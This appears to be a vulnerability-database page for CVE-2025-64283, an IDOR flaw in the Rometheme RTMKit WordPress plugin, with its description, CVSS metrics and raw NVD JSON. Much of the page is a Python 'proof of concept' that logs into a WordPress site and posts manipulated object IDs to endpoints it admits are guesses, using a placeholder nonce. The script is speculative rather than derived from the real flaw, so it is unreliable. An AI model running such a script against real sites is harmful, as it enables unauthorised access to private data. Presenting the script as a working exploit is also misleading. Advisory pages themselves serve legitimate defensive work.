Security Vulnerability Report
中文
CVE-2025-64283 CVSS 6.5 MEDIUM

CVE-2025-64283

Published: 2025-10-29 09:15:45
Last Modified: 2026-04-15 00:35:42

Description

Authorization Bypass Through User-Controlled Key vulnerability in Rometheme RTMKit rometheme-for-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects RTMKit: from n/a through <= 1.6.7.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Rometheme RTMKit <= 1.6.7 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-64283 PoC - Rometheme RTMKit IDOR Vulnerability Note: This is a conceptual PoC for educational purposes only. """ import requests import argparse from urllib.parse import urljoin def exploit_idor(target_url, username, password, target_object_id): """ Exploit IDOR vulnerability in Rometheme RTMKit plugin Args: target_url: Target WordPress site URL username: Valid low-privilege WordPress account username password: Password for the account target_object_id: ID of the object to access (e.g., post ID, user ID) """ session = requests.Session() # Step 1: Login to WordPress login_url = urljoin(target_url, '/wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } print(f"[*] Logging in as {username}...") response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in session.cookies: print("[-] Login failed!") return False print("[+] Login successful!") # Step 2: Identify vulnerable endpoint # Common vulnerable endpoints in RTMKit plugin vulnerable_endpoints = [ '/wp-admin/admin-ajax.php?action=rtmkit_get_data', '/wp-json/wp/v2/rtmkit/', '/wp-admin/admin-ajax.php', ] # Step 3: Exploit IDOR by manipulating object ID print(f"[*] Attempting to access object ID: {target_object_id}") for endpoint in vulnerable_endpoints: exploit_url = urljoin(target_url, endpoint) # IDOR payload - manipulate the object reference exploit_data = { 'object_id': target_object_id, 'object_type': 'post', # or 'user', 'settings', etc. 'nonce': 'attacker_controlled_or_missing_nonce' } print(f"[*] Testing endpoint: {exploit_url}") response = session.post(exploit_url, data=exploit_data, timeout=10) # Check for successful unauthorized access if response.status_code == 200: if 'error' not in response.text.lower() and len(response.text) > 0: print(f"[+] Potential IDOR exploited at {endpoint}") print(f"[+] Response preview: {response.text[:500]}") return True print("[-] No vulnerable endpoint found or patch already applied") return False def main(): parser = argparse.ArgumentParser(description='CVE-2025-64283 PoC') parser.add_argument('-u', '--url', required=True, help='Target WordPress URL') parser.add_argument('-usr', '--username', required=True, help='WordPress username') parser.add_argument('-pwd', '--password', required=True, help='WordPress password') parser.add_argument('-id', '--object-id', type=int, required=True, help='Target object ID') args = parser.parse_args() exploit_idor(args.url, args.username, args.password, args.object_id) if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64283", "sourceIdentifier": "[email protected]", "published": "2025-10-29T09:15:44.957", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in Rometheme RTMKit rometheme-for-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects RTMKit: from n/a through <= 1.6.7."}, {"lang": "es", "value": "Vulnerabilidad de omisión de autorización a través de clave controlada por el usuario en Rometheme RTMKit rometheme-for-elementor permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a RTMKit: desde n/a hasta menor igual que 1.6.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/rometheme-for-elementor/vulnerability/wordpress-rtmkit-plugin-1-6-7-insecure-direct-object-references-idor-vulnerability?_s_id=cve", "source": "[email protected]"}]}}